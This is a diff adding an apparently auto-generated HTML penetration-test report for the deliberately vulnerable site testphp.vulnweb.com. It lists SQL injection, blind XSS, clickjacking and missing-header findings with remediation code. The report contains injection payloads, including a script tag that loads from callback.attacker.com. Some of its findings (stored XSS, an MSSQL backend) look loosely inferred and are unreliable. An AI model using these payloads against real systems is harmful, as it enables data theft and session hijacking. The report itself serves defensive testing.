+                    <p>1. **Implement Parameterized Queries (Prepared Statements)**: Replace all dynamic SQL queries with parameterized queries or prepared statements. For PHP applications, use PDO prepared statements or MySQLi prepared statements:
+
+```php
+// Vulnerable code:
+$query = &quot;SELECT * FROM products WHERE category = &#39;&quot; . $_GET[&#39;cat&#39;] . &quot;&#39;&quot;;
+
+// Secure code:
+$stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = ?&quot;);
+$stmt-&gt;execute([$_GET[&#39;cat&#39;]]);
+```
+
+2. **Input Validation and Sanitization**: Implement strict input validation on all user-supplied data. Use allowlisting for expected values where possible:
+
+```php
+$allowed_categories = [&#39;electronics&#39;, &#39;books&#39;, &#39;clothing&#39;];
+if (!in_array($_GET[&#39;cat&#39;], $allowed_categories)) {
+    throw new InvalidArgumentException(&#39;Invalid category&#39;);
+}
+```
+
+3. **Implement Stored Procedures**: Where applicable, use stored procedures to encapsulate database logic and reduce direct SQL construction in application code.
+
+4. **Apply Principle of Least Privilege**: Configure database user accounts with minimal necessary permissions. The web application should not use administrative database accounts.
+
+5. **Enable SQL Injection Detection**: Implement Web Application Firewall (WAF) rules to detect and block SQL injection attempts. Use tools like ModSecurity with OWASP Core Rule Set.
+
+6. **Error Handling**: Implement generic error pages that don&#39;t reveal database structure or technical details to end users. Log detailed errors server-side for debugging purposes.
+
+7. **Regular Security Testing**: Conduct regular code reviews, static analysis scanning (SAST), and dynamic testing (DAST) to identify injection vulnerabilities during development.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #fd7e14;">HIGH</span>
+                    <h3>Blind SQL Injection (Boolean-based)</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sqli_blind</span>
+                    <span><strong>CWE:</strong> CWE-89</span>
+                    <span><strong>CVSS:</strong> 7.5</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=&#39;+AND+1%3D1--</p>
+                    <p><strong>Description:</strong> A blind SQL injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint on the target application. This vulnerability allows an attacker to inject malicious SQL code that is executed by the backend database without direct error messages or data being returned in the response. The vulnerability was confirmed through boolean-based blind SQL injection techniques, where different SQL conditions produced varying response behaviors from the application.
+
+The exploitation technique relies on crafting SQL payloads that evaluate to true or false conditions, allowing an attacker to infer information about the database structure and contents based on the application&#39;s response patterns. In this case, the payload &#39;AND 1=1--&#39; was successfully injected, and the application exhibited different behavior patterns that confirmed the presence of SQL injection. The error patterns observed in the response suggest that the injected SQL syntax is being processed by the database engine, indicating that user input is being directly concatenated into SQL queries without proper sanitization.
+
+This vulnerability exists in a web application parameter that appears to handle product category filtering functionality. The lack of input validation and parameterized query usage allows malicious SQL code to be interpreted as part of the legitimate database query, compromising the security of the underlying database system.</p>
+                    <p><strong>Impact:</strong> An attacker exploiting this blind SQL injection vulnerability could systematically extract sensitive information from the backend database, including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based or boolean-based blind injection techniques, an attacker could enumerate database schemas, table structures, and extract data row by row. In worst-case scenarios, depending on database permissions and configuration, an attacker might achieve administrative database access, potentially leading to complete database compromise, data manipulation, or deletion of critical business information.
+
+From a business perspective, this vulnerability poses significant risks including data breaches that could result in regulatory fines under compliance frameworks such as PCI-DSS (if payment card data is stored), GDPR (for EU personal data), HIPAA (for healthcare information), or other applicable data protection regulations. The reputational damage from a data breach, combined with potential legal liabilities and business disruption, could have lasting financial and operational impacts. Additionally, if the database contains customer information or intellectual property, competitors could gain unfair business advantages through unauthorized data access.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A blind SQL injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint on the target application. This vulnerability allows an attacker to inject malicious SQL code that is executed by the backend database without direct error messages or data being returned in the response. The vulnerability was confirmed through boolean-based blind SQL injection techniques, where different SQL conditions produced varying response behaviors from the application.
+
+The exploitation technique relies on crafting SQL payloads that evaluate to true or false conditions, allowing an attacker to infer information about the database structure and contents based on the application&#39;s response patterns. In this case, the payload &#39;AND 1=1--&#39; was successfully injected, and the application exhibited different behavior patterns that confirmed the presence of SQL injection. The error patterns observed in the response suggest that the injected SQL syntax is being processed by the database engine, indicating that user input is being directly concatenated into SQL queries without proper sanitization.
+
+This vulnerability exists in a web application parameter that appears to handle product category filtering functionality. The lack of input validation and parameterized query usage allows malicious SQL code to be interpreted as part of the legitimate database query, compromising the security of the underlying database system.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to sqli_blind based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&#39; AND 1=1--</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>An attacker exploiting this blind SQL injection vulnerability could systematically extract sensitive information from the backend database, including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based or boolean-based blind injection techniques, an attacker could enumerate database schemas, table structures, and extract data row by row. In worst-case scenarios, depending on database permissions and configuration, an attacker might achieve administrative database access, potentially leading to complete database compromise, data manipulation, or deletion of critical business information.
+
+From a business perspective, this vulnerability poses significant risks including data breaches that could result in regulatory fines under compliance frameworks such as PCI-DSS (if payment card data is stored), GDPR (for EU personal data), HIPAA (for healthcare information), or other applicable data protection regulations. The reputational damage from a data breach, combined with potential legal liabilities and business disruption, could have lasting financial and operational impacts. Additionally, if the database contains customer information or intellectual property, competitors could gain unfair business advantages through unauthorized data access.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Parameterized Queries/Prepared Statements**: Replace all dynamic SQL query construction with parameterized queries or prepared statements. For PHP applications, use PDO with parameter binding:
+```php
+$stmt = $pdo-&gt;prepare(&#39;SELECT * FROM products WHERE category_id = ?&#39;);
+$stmt-&gt;execute([$_GET[&#39;cat&#39;]]);
+```
+
+2. **Input Validation and Sanitization**: Implement strict input validation on the &#39;cat&#39; parameter to ensure it only accepts expected integer values for category IDs. Use whitelisting rather than blacklisting approaches:
+```php
+$cat = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_VALIDATE_INT);
+if ($cat === false || $cat &lt; 1) {
+    // Handle invalid input
+    exit(&#39;Invalid category parameter&#39;);
+}
+```
+
+3. **Apply Least Privilege Principle**: Configure database user accounts used by the application with minimal necessary permissions. Remove unnecessary privileges such as DROP, CREATE, or administrative functions from application database users.
+
+4. **Implement Web Application Firewall (WAF)**: Deploy a WAF with SQL injection detection rules to provide an additional layer of protection against injection attempts.
+
+5. **Enable Database Query Logging**: Configure database logging to monitor and alert on suspicious query patterns that might indicate injection attempts.
+
+6. **Regular Security Code Reviews**: Implement mandatory security code reviews focusing on data access layers and user input handling to identify similar vulnerabilities before deployment.
+
+7. **Use ORM Frameworks**: Consider migrating to Object-Relational Mapping (ORM) frameworks that provide built-in protection against SQL injection when used correctly.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #fd7e14;">HIGH</span>
+                    <h3>Time-based Blind SQL Injection</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sqli_time</span>
+                    <span><strong>CWE:</strong> CWE-89</span>
+                    <span><strong>CVSS:</strong> 7.5</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=&#39;%3B+WAITFOR+DELAY+&#39;0:0:5&#39;--</p>
+                    <p><strong>Description:</strong> A time-based blind SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which accepts user input that is directly incorporated into SQL queries without proper sanitization or parameterization. Through systematic testing, it was confirmed that malicious SQL syntax including time delay functions can be injected to manipulate the database query execution.
+
+The vulnerability was confirmed using a WAITFOR DELAY payload that introduces a deliberate 5-second delay in the SQL query execution. This time-based technique is particularly effective for blind SQL injection attacks where error messages or query results are not directly visible to the attacker. The application&#39;s response time differential (normal vs. delayed responses) serves as a reliable indicator of successful SQL injection, allowing attackers to extract sensitive information through boolean-based logical queries.
+
+The specific payload &#39;; WAITFOR DELAY &#39;0:0:5&#39;-- successfully triggered the time delay, confirming that the application is running on a Microsoft SQL Server backend and that the injected SQL syntax is being executed within the database context. The error patterns observed in the application responses further validate the presence of SQL syntax errors, indicating insufficient input validation and improper error handling.</p>
+                    <p><strong>Impact:</strong> This SQL injection vulnerability poses significant risks to the organization&#39;s data security and regulatory compliance. An attacker can exploit this vulnerability to extract sensitive information from the database including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based blind injection techniques, attackers can systematically enumerate database schemas, extract table contents, and potentially gain administrative access to the database server.
+
+The worst-case scenario includes complete database compromise, leading to unauthorized access to all stored data, potential data exfiltration, and possible lateral movement within the internal network if database credentials are reused. This vulnerability also creates significant compliance risks under regulations such as PCI-DSS (if payment card data is stored), GDPR (for personal data of EU residents), and HIPAA (if healthcare information is involved). Data breach notification requirements, regulatory fines, and reputational damage are likely consequences if this vulnerability is exploited by malicious actors.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A time-based blind SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which accepts user input that is directly incorporated into SQL queries without proper sanitization or parameterization. Through systematic testing, it was confirmed that malicious SQL syntax including time delay functions can be injected to manipulate the database query execution.
+
+The vulnerability was confirmed using a WAITFOR DELAY payload that introduces a deliberate 5-second delay in the SQL query execution. This time-based technique is particularly effective for blind SQL injection attacks where error messages or query results are not directly visible to the attacker. The application&#39;s response time differential (normal vs. delayed responses) serves as a reliable indicator of successful SQL injection, allowing attackers to extract sensitive information through boolean-based logical queries.
+
+The specific payload &#39;; WAITFOR DELAY &#39;0:0:5&#39;-- successfully triggered the time delay, confirming that the application is running on a Microsoft SQL Server backend and that the injected SQL syntax is being executed within the database context. The error patterns observed in the application responses further validate the presence of SQL syntax errors, indicating insufficient input validation and improper error handling.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to sqli_time based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&#39;; WAITFOR DELAY &#39;0:0:5&#39;--</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>This SQL injection vulnerability poses significant risks to the organization&#39;s data security and regulatory compliance. An attacker can exploit this vulnerability to extract sensitive information from the database including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based blind injection techniques, attackers can systematically enumerate database schemas, extract table contents, and potentially gain administrative access to the database server.
+
+The worst-case scenario includes complete database compromise, leading to unauthorized access to all stored data, potential data exfiltration, and possible lateral movement within the internal network if database credentials are reused. This vulnerability also creates significant compliance risks under regulations such as PCI-DSS (if payment card data is stored), GDPR (for personal data of EU residents), and HIPAA (if healthcare information is involved). Data breach notification requirements, regulatory fines, and reputational damage are likely consequences if this vulnerability is exploited by malicious actors.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Parameterized Queries/Prepared Statements**: Replace dynamic SQL construction with parameterized queries. For PHP applications, use PDO or MySQLi with bound parameters:
+
+```php
+// Vulnerable code:
+$query = &quot;SELECT * FROM products WHERE category = &#39;&quot; . $_GET[&#39;cat&#39;] . &quot;&#39;&quot;;
+
+// Secure code:
+$stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = ?&quot;);
+$stmt-&gt;execute([$_GET[&#39;cat&#39;]]);
+```
+
+2. **Input Validation and Sanitization**: Implement strict input validation on the server-side. Use allowlists for expected values and reject any input containing SQL metacharacters:
+
+```php
+$cat = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_VALIDATE_INT);
+if ($cat === false || $cat &lt; 1) {
+    die(&#39;Invalid category ID&#39;);
+}
+```
+
+3. **Implement Stored Procedures**: Use stored procedures with parameterized inputs to create an additional layer of separation between code and data.
+
+4. **Database Security Hardening**: Apply the principle of least privilege by creating dedicated database users with minimal required permissions. Remove unnecessary database features like xp_cmdshell and disable error message disclosure in production.
+
+5. **Web Application Firewall (WAF)**: Deploy a WAF with SQL injection detection rules as a defense-in-depth measure, though this should not be the primary mitigation strategy.
+
+6. **Regular Security Testing**: Implement automated security testing in the CI/CD pipeline and conduct regular penetration testing to identify similar vulnerabilities.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #fd7e14;">HIGH</span>
+                    <h3>Blind Cross-Site Scripting</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> blind_xss</span>
+                    <span><strong>CWE:</strong> CWE-79</span>
+                    <span><strong>CVSS:</strong> 8.8</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=%3Cscript+src%3D//callback.attacker.com%3E%3C/script%3E</p>
+                    <p><strong>Description:</strong> A Blind Cross-Site Scripting (XSS) vulnerability was identified in the product listing functionality of the web application. The vulnerability exists in the &#39;cat&#39; parameter of the listproducts.php endpoint, where user-supplied input is stored and later rendered in web pages viewed by other users without proper sanitization or encoding. Unlike reflected XSS, this blind/stored variant persists the malicious payload in the application&#39;s data store, making it more dangerous as it affects multiple users over time.
+
+The vulnerability was confirmed by injecting a JavaScript payload that references an external script hosted at &#39;callback.attacker.com&#39;. When the payload is processed and stored by the application, it gets executed in the browsers of users who subsequently view the affected page. The payload successfully bypassed the application&#39;s input validation mechanisms, indicating insufficient server-side security controls. Additionally, error patterns suggesting potential SQL injection vulnerabilities were observed, indicating the parameter may be susceptible to multiple attack vectors.
+
+This particular implementation appears to store user input directly into a database or file system without proper sanitization, and then renders this content in HTML responses without appropriate output encoding. The blind nature of this XSS means that the payload execution occurs asynchronously, making detection more challenging and allowing attackers to maintain persistence within the application.</p>
+                    <p><strong>Impact:</strong> The impact of this stored XSS vulnerability is severe and multifaceted. Attackers can execute arbitrary JavaScript code in the browsers of legitimate users, leading to complete session hijacking through cookie theft, credential harvesting via fake login forms, and unauthorized actions performed on behalf of victims. In an enterprise environment, this could result in privilege escalation if administrative users are targeted, potentially compromising entire systems and sensitive business data.
+
+The persistent nature of stored XSS means that every user visiting the affected product listing page will execute the malicious script, creating a widespread attack vector that could affect hundreds or thousands of users. Attackers could establish persistent access to user accounts, steal sensitive information including personal data, financial details, and proprietary business information. The vulnerability could also be leveraged to distribute malware, perform internal network reconnaissance, or establish Command and Control (C2) communications.
+
+From a compliance perspective, this vulnerability poses significant risks under regulations such as PCI-DSS (if payment card data is accessible), GDPR (due to potential personal data exposure), HIPAA (in healthcare environments), and SOX (for publicly traded companies). The ability to execute arbitrary code in user browsers could lead to data breaches resulting in regulatory fines, legal liability, reputational damage, and loss of customer trust. Organizations may face mandatory breach notifications and potential lawsuits from affected users.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A Blind Cross-Site Scripting (XSS) vulnerability was identified in the product listing functionality of the web application. The vulnerability exists in the &#39;cat&#39; parameter of the listproducts.php endpoint, where user-supplied input is stored and later rendered in web pages viewed by other users without proper sanitization or encoding. Unlike reflected XSS, this blind/stored variant persists the malicious payload in the application&#39;s data store, making it more dangerous as it affects multiple users over time.
+
+The vulnerability was confirmed by injecting a JavaScript payload that references an external script hosted at &#39;callback.attacker.com&#39;. When the payload is processed and stored by the application, it gets executed in the browsers of users who subsequently view the affected page. The payload successfully bypassed the application&#39;s input validation mechanisms, indicating insufficient server-side security controls. Additionally, error patterns suggesting potential SQL injection vulnerabilities were observed, indicating the parameter may be susceptible to multiple attack vectors.
+
+This particular implementation appears to store user input directly into a database or file system without proper sanitization, and then renders this content in HTML responses without appropriate output encoding. The blind nature of this XSS means that the payload execution occurs asynchronously, making detection more challenging and allowing attackers to maintain persistence within the application.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to blind_xss based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&lt;script src=//callback.attacker.com&gt;&lt;/script&gt;</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>The impact of this stored XSS vulnerability is severe and multifaceted. Attackers can execute arbitrary JavaScript code in the browsers of legitimate users, leading to complete session hijacking through cookie theft, credential harvesting via fake login forms, and unauthorized actions performed on behalf of victims. In an enterprise environment, this could result in privilege escalation if administrative users are targeted, potentially compromising entire systems and sensitive business data.
+
+The persistent nature of stored XSS means that every user visiting the affected product listing page will execute the malicious script, creating a widespread attack vector that could affect hundreds or thousands of users. Attackers could establish persistent access to user accounts, steal sensitive information including personal data, financial details, and proprietary business information. The vulnerability could also be leveraged to distribute malware, perform internal network reconnaissance, or establish Command and Control (C2) communications.
+
+From a compliance perspective, this vulnerability poses significant risks under regulations such as PCI-DSS (if payment card data is accessible), GDPR (due to potential personal data exposure), HIPAA (in healthcare environments), and SOX (for publicly traded companies). The ability to execute arbitrary code in user browsers could lead to data breaches resulting in regulatory fines, legal liability, reputational damage, and loss of customer trust. Organizations may face mandatory breach notifications and potential lawsuits from affected users.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Proper Input Sanitization and Output Encoding:**
+   - Sanitize all user input on the server-side using allowlist validation
+   - Implement context-appropriate output encoding (HTML entity encoding for HTML context, JavaScript encoding for JS context)
+   - Example PHP code:
+   ```php
+   // Input sanitization
+   $cat_param = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH);
+   
+   // Output encoding
+   echo htmlspecialchars($cat_param, ENT_QUOTES | ENT_HTML5, &#39;UTF-8&#39;);
+   ```
+
+2. **Deploy Content Security Policy (CSP):**
+   - Implement a strict CSP header to prevent execution of inline scripts and restrict script sources
+   - Example CSP header: `Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; object-src &#39;none&#39;; base-uri &#39;self&#39;;`
+   - This provides defense-in-depth even if XSS payloads bypass other controls
+
+3. **Use Prepared Statements and Parameterized Queries:**
+   - Given the SQL error patterns observed, ensure all database queries use prepared statements
+   - Example PHP PDO implementation:
+   ```php
+   $stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = :cat&quot;);
+   $stmt-&gt;bindParam(&#39;:cat&#39;, $cat_param, PDO::PARAM_STR);
+   $stmt-&gt;execute();
+   ```
+
+4. **Implement Web Application Firewall (WAF):**
+   - Deploy a WAF with rules to detect and block XSS and SQL injection attempts
+   - Configure custom rules for the specific application patterns
+   - Regularly update WAF rulesets to address new attack vectors
+
+5. **Security Headers and Browser Protections:**
+   - Implement X-XSS-Protection, X-Content-Type-Options, and X-Frame-Options headers
+   - Use HTTPOnly and Secure flags on all session cookies
+   - Implement proper CORS policies to restrict cross-origin requests
+
+6. **Regular Security Testing:**
+   - Implement automated security scanning in the CI/CD pipeline
+   - Conduct regular penetration testing focusing on injection vulnerabilities
+   - Use static and dynamic application security testing (SAST/DAST) tools</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Clickjacking</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> clickjacking</span>
+                    <span><strong>CWE:</strong> CWE-1021</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> A clickjacking vulnerability was identified on the target application at http://testphp.vulnweb.com/. This vulnerability exists due to the absence of proper frame-busting protections, specifically the lack of X-Frame-Options header and Content Security Policy (CSP) frame-ancestors directive. The application can be successfully embedded within an HTML iframe, allowing malicious websites to overlay the legitimate application with deceptive content or transparent layers.
+
+Clickjacking attacks, also known as UI redress attacks, work by tricking users into clicking on elements of the vulnerable application while believing they are interacting with a different interface. An attacker can create a malicious webpage that loads the target application in an invisible or disguised iframe, then position clickable elements over the legitimate application&#39;s buttons or links. When users attempt to interact with what appears to be the attacker&#39;s interface, they unknowingly perform actions on the underlying legitimate application.
+
+In the context of this specific application, the vulnerability was confirmed by observing that HTTP responses lack the X-Frame-Options security header and do not implement Content Security Policy frame-ancestors directive. This means the application provides no browser-level protection against being embedded in frames by third-party websites, making it fully susceptible to clickjacking attacks.</p>
+                    <p><strong>Impact:</strong> The clickjacking vulnerability could enable attackers to perform unauthorized actions on behalf of authenticated users without their knowledge or consent. Potential impacts include unauthorized form submissions, unintended purchases or financial transactions, modification of user account settings, or disclosure of sensitive information through social engineering. In applications handling sensitive data or financial transactions, this could lead to significant financial losses or privacy breaches.
+
+From a compliance perspective, this vulnerability may violate security requirements under regulations such as PCI-DSS (particularly requirements 6.5.1 regarding injection flaws and 11.3.2 for application security testing), and could potentially impact GDPR compliance if personal data processing occurs through clickjacked actions. The reputational damage from successful clickjacking attacks could also result in loss of customer trust and potential legal liability, especially if sensitive user actions are performed without proper authorization.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Frame-Options Header**: Configure the web server or application to send the X-Frame-Options header with appropriate values:
+   - `X-Frame-Options: DENY` - Prevents the page from being embedded in any frame
+   - `X-Frame-Options: SAMEORIGIN` - Allows framing only by pages from the same origin
+   - `X-Frame-Options: ALLOW-FROM https://trusted-domain.com` - Allows framing only from specific domains (deprecated)
+
+2. **Deploy Content Security Policy (CSP)**: Implement a robust CSP with frame-ancestors directive:
+   - `Content-Security-Policy: frame-ancestors &#39;none&#39;;` - Equivalent to X-Frame-Options: DENY
+   - `Content-Security-Policy: frame-ancestors &#39;self&#39;;` - Equivalent to X-Frame-Options: SAMEORIGIN
+   - `Content-Security-Policy: frame-ancestors &#39;self&#39; https://trusted-domain.com;` - Allow specific trusted domains
+
+3. **Server Configuration Examples**:
+   - **Apache**: Add `Header always set X-Frame-Options &quot;DENY&quot;` to .htaccess or virtual host configuration
+   - **Nginx**: Add `add_header X-Frame-Options &quot;DENY&quot; always;` to server configuration
+   - **Application Level**: Set headers programmatically in application code before sending responses
+
+4. **JavaScript Frame-Busting (Defense in Depth)**: Implement client-side frame-busting code as an additional layer:
+   ```javascript
+   if (top !== self) {
+       top.location = self.location;
+   }
+   ```
+
+5. **Regular Security Testing**: Implement automated security testing to verify frame protection headers are properly configured across all application endpoints and ensure they remain in place during application updates.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/ is missing the X-Content-Type-Options security header. This header is a critical security control that prevents browsers from performing MIME type sniffing, which can lead to content type confusion attacks. When this header is not present, browsers may interpret files differently than intended by the server, potentially executing malicious content.
+
+The absence of the X-Content-Type-Options header was confirmed through HTTP response analysis, where the header was completely missing from server responses. This creates an opportunity for attackers to upload files with misleading extensions or content types that could be interpreted and executed as different file types by the browser, bypassing content security policies and potentially leading to cross-site scripting (XSS) attacks.
+
+In the context of this application, the missing header increases the attack surface for content-based attacks, particularly in scenarios where user-generated content is served or file uploads are permitted. This vulnerability is especially concerning for web applications that handle file uploads or serve user-controlled content, as it removes a fundamental browser security mechanism.</p>
+                    <p><strong>Impact:</strong> The absence of the X-Content-Type-Options header can lead to several security risks with moderate business impact. Attackers could potentially exploit MIME type confusion to execute malicious scripts in the context of the application, leading to cross-site scripting attacks that could compromise user sessions, steal sensitive information, or perform unauthorized actions on behalf of legitimate users. In file upload scenarios, attackers might upload files with deceptive extensions that browsers interpret as executable content, bypassing basic file type restrictions.
+
+While this vulnerability alone may not provide direct system compromise, it significantly weakens the application&#39;s defense-in-depth security posture and can be chained with other vulnerabilities to increase attack impact. From a compliance perspective, organizations subject to security frameworks like PCI-DSS, SOC 2, or industry-specific regulations may face audit findings for inadequate security header implementation, as these frameworks increasingly emphasize comprehensive security controls including HTTP security headers.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Add the X-Content-Type-Options header with the value &#39;nosniff&#39; to all HTTP responses. This can be implemented at the web server level, application level, or through a web application firewall.
+
+**Apache Configuration (.htaccess or httpd.conf):**
+```apache
+Header always set X-Content-Type-Options nosniff
+```
+
+**Nginx Configuration:**
+```nginx
+add_header X-Content-Type-Options nosniff always;
+```
+
+**Application Level (PHP example):**
+```php
+header(&#39;X-Content-Type-Options: nosniff&#39;);
+```
+
+2. **Implement Comprehensive Security Headers**: Deploy a complete set of HTTP security headers including Content Security Policy (CSP), X-Frame-Options, X-XSS-Protection, and Strict-Transport-Security to create defense-in-depth protection.
+
+3. **Content Type Validation**: Implement strict server-side content type validation for all file uploads and user-generated content. Ensure that Content-Type headers are explicitly set and match the actual file content through file signature verification.
+
+4. **Regular Security Header Auditing**: Implement automated testing to regularly verify the presence and correct configuration of security headers across all application endpoints and environments.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/ does not implement a Content Security Policy (CSP) header, leaving it vulnerable to various client-side attacks. Content Security Policy is a security mechanism that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks by defining which sources of content are considered trustworthy. During the penetration test, HTTP responses were analyzed and confirmed to lack the &#39;Content-Security-Policy&#39; header entirely.
+
+Without CSP implementation, the application cannot control which resources (scripts, stylesheets, images, etc.) the browser is allowed to load and execute. This creates an opportunity for attackers to inject malicious content through various vectors such as reflected or stored XSS vulnerabilities. The absence of CSP also prevents the application from leveraging modern browser security features that could mitigate exploitation of other vulnerabilities that may exist within the application.
+
+The missing CSP header represents a defense-in-depth security control gap that could amplify the impact of other client-side vulnerabilities. While not directly exploitable on its own, this missing security header reduces the application&#39;s resilience against common web application attacks and fails to provide users with the additional protection that modern browsers can offer.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy primarily increases the application&#39;s susceptibility to client-side attacks and reduces the effectiveness of browser-based security controls. If other vulnerabilities such as XSS exist within the application, the lack of CSP makes exploitation significantly easier and more impactful. Attackers could potentially execute arbitrary JavaScript code, steal session tokens or sensitive data, perform actions on behalf of users, or redirect users to malicious websites.
+
+From a business perspective, successful exploitation of client-side vulnerabilities could lead to account takeovers, data theft, financial fraud, or reputational damage. The impact is particularly concerning for applications handling sensitive data such as personal information, financial records, or authentication credentials. Additionally, organizations subject to compliance requirements such as PCI-DSS, GDPR, or HIPAA may face regulatory scrutiny for failing to implement reasonable security measures like CSP, especially if a security incident occurs that could have been mitigated by proper CSP implementation.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Header**: Add a comprehensive CSP header to all HTTP responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Server Configuration Examples**:
+   - **Apache**: Add to .htaccess or virtual host configuration:
+     ```apache
+     Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot;
+     ```
+   - **Nginx**: Add to server block:
+     ```nginx
+     add_header Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot; always;
+     ```
+   - **Application Level (PHP)**: Add to application code:
+     ```php
+     header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;&quot;);
+     ```
+
+3. **CSP Directive Recommendations**:
+   - Use &#39;self&#39; for trusted same-origin resources
+   - Avoid &#39;unsafe-inline&#39; and &#39;unsafe-eval&#39; when possible
+   - Implement nonces or hashes for inline scripts/styles
+   - Use &#39;strict-dynamic&#39; for modern browsers with nonce-based policies
